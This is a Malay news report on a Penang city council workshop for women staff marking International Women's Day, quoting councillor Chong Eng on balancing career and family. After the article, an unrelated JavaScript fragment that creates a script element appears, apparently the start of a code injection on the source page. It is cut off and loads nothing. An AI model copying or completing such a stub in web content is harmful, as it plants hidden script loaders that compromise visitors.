Oleh : NORSHAHIDA YUSOFF
Gambar : ALISSALA THIAN
GEORGE TOWN – Antara cabaran yang perlu ditempuhi golongan wanita adalah untuk menyeimbangkan urusan kerjaya dengan tuntutan keluarga, kata Exco Belia & Sukan, Pembangunan Wanita, Keluarga dan Komuniti, Chong Eng di sini baru-baru ini.
Katanya, golongan wanita adalah adik, kakak, isteri dan ibu di dalam keluarga.
“Dengan tanggungjawab yang semakin mencabar dan pada masa sama perlu bersaing dengan lelaki, sesungguhnya kita (wanita) adalah wanita-wanita hebat!
“Justeru, kita (golongan wanita) harus meneruskan perjuangan bagi mencapai lebih banyak kejayaan tanpa mengira sama ada pada aspek kerjaya mahupun membina keluarga,” ucapnya pada Majlis Perasmian
Bengkel Lean In@MBPP di sini baru-baru ini. Turut hadir, Ketua Pegawai Eksekutif Perbadanan Pembangunan Wanita Pulau Pinang (PWDC), Aloyah A. Bakar.
Bengkel Lean In @ MBPP diadakan sempena sambutan Hari Wanita Sedunia bagi meningkatkan kesedaran asas mengenai gender dan isu-isu berkaitan.
Kira – kira 100 kakitangan wanita Majlis Bandaraya Pulau Pinang (MBPP) hadir pada bengkel anjuran bersama pihak berkuasa tempatan (PBT) berkaitan dan PWDC.
Tambah Chong Eng, beliau berharap menerusi penganjuran bengkel sedemikian, ia mampu membentuk suatu rangkaian sokongan informal dalam kalangan kakitangan Majlis dalam mewujud serta membincangkan isu-isu gender.
var d=document;var s=d.createElement(‘script’);